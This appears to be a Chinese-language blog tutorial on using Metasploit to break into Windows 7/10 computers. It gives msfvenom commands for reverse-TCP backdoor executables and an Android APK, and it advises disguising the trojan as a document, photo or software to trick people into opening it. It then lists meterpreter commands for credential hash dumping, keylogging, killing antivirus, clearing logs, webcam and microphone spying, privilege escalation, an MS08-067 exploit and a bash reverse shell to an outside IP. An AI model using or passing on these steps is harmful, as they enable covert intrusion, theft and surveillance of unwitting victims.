admin管理员组

文章数量:1565349

msf exploit入侵电脑(Win7/Win10皆可)

需要的工具:msfvenom . msfconsole (kali里面有)

msfvenom -p windows/meterpreter/reverse_tcp LHOST=本地ip LPORT=本地端口号 –f exe –o 文件名.exe
msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.60.144 LPORT=6666 -f exe -o test.exe

# 也可以尝试生成安卓手机的恶意软件,在此不推荐尝试
msfvenom -p android/meterpreter/reverse_tcp LHOST=172.16.60.144 LPORT=8888 R> test.apk


即生成一个后门文件test.exe

然后继续执行命令:

msfconsole (运行msfconsole)

msf>use exploit/multi/handler (选择模块)
输入命令show payloads会显示出有效的攻击载荷,比如shell_reverse_tcp。
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
set lhost 加ip地址
set lport 加端口号

msf exploit(handler) > exploit -z -j (后台执行)

这样木马就配置好了,然后发给别人(可以伪造成文档,照片,软件等文件骗取别人打开)

发给别人后,等待别人打开test.exe,打开即上钩了

msf exploit(handler) > sessions(查看上钩的用户)

msf exploit(handler) > sessions -i 1(选择需要攻击的用户,这里选择第 1 个)

进入meterpreter了,即可进行一些相关的木马操作。

background:这个命令是将当前的session放到后台运行,可以在msf中继续其他渗透任务;
sessions:这个命令需要配合上面的background使用,该命令是将后台的会话打开,进行会话操作。
clearev:该命令是用来清除渗透的登录信息的,这个很有用。
hashdump:该命令是一个post模块,需要配合meterpreter使用,这个命令是用来获取目标系统的哈希值的
meterpreter > run post/windows/gather/hashdump
migrate:这个也是一个post模块。可以将meterpreter当前的进程移动到其他指定的进程中,这样做的好处是可以给meterpreter一个相对稳定的运行环境,同时可以很好的躲避杀软。
meterpreter > run post/windows/manage/migrate
webcam_list:列举摄像头。
webcam_snap:通过远程连接目标系统的摄像头。
run killav:关闭对方的杀软,其实关闭杀软也可以进入cmd中手动关闭。


meterpreter
meterpreter是更高级的payload。
纯内存工作模式(不写硬盘),避免被电子取证;加密的通信协议,对传输过程进行加密;易于扩展。

基本命令

	msf > use exploit/windows/smb/ms08_067_netapi

    msf exploit(ms08_067_netapi) > set rhost 192.168.80.148

    msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp

    msf exploit(ms08_067_netapi) > set lhost 192.168.80.163

    msf exploit(ms08_067_netapi) > exploit -j

    msf exploit(ms08_067_netapi) > sessions -i 1  进入meterpreter类型的shell
	meterpreter > background  退出到msf命令提示符下

    meterpreter > lpwd  等价于在kali上输入pwd

    meterpreter > lcd /etc  等价于在kali上输入cd /etc

    meterpreter > run post/windows/gather/smart_hashdump  获取目标主机上用户的hash值

    meterpreter > run post/windows/capture/keylog_recorder  键盘记录

    meterpreter > run killav  结束目标主机上的杀毒软件相关进程

    meterpreter > clearev  清除系统日志

    meterpreter > download boot.ini  下载目标主机上的boot.ini文件

    meterpreter > upload /usr/share/windows-binaries/nc.exe c:\\windows\\system32  上传nc.exe到目标主机上。(注意要使用2个反斜杠)

    meterpreter > dir windows\\system32\\nc.exe

    meterpreter > execute -f nc -nvlp 3333  执行nc.exe

    meterpreter > execute -f "bash -i >& /dev/tcp/104.199.1.1/82 0>&1"

    meterpreter > execute -f bash -i -H

    meterpreter > execute -f cmd.exe -i -H  获得目标主机的shell,-i交互模式,-H隐藏

    meterpreter > execute -H -m -d calc.exe -f wce32.exe -a "-o foo.txt"

    meterpreter > cat foo.txt 
-m 直接从内存中执行攻击端的可执行文件,不在硬盘存储,所以不会留下痕迹,且能避开杀毒软件的查杀;-d 设置需要显示的进程名,可以避开敏感人士的检查。
	meterpreter > getuid  查看当前用户

    meterpreter > getsystem  提权到system用户

    meterpreter > getprivs  查看当前用户具有的权限

    meterpreter > getpid  查看meterpreter注入到了什么进程中

    meterpreter > migrate 1436   更改到pid1436进程中

    meterpreter > getpid  重新使用getpid命令查看

    meterpreter > hashdump  获取目标主机上用户的hash值

    meterpreter > sysinfo  查看目标系统的信息

    meterpreter > kill 188  结束188进程

    meterpreter > shell  获取目标操作系统的shell

    meterpreter > idletime  查看目标主机已经空闲了多长时间

    meterpreter > edit C:\\Windows\\System32\\drivers\\etc\\hosts  编辑hosts文件

    meterpreter > record_mic -d 10 -f /root/桌面/1.mp4  监听麦克风

    meterpreter > load python  加载python插件

本文标签: 电脑ExploitMSF